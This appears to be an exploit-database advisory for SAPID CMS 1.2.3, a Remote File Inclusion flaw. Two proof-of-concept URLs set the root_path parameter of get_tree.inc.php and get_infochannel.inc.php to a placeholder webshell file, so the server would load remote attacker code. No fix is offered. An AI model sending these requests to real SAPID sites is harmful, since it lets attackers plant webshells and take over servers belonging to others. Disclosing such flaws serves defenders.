SAPID 1.2.3 Stable Remote File Inclusion Vulnerability

2012-01-09 11:15:03

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.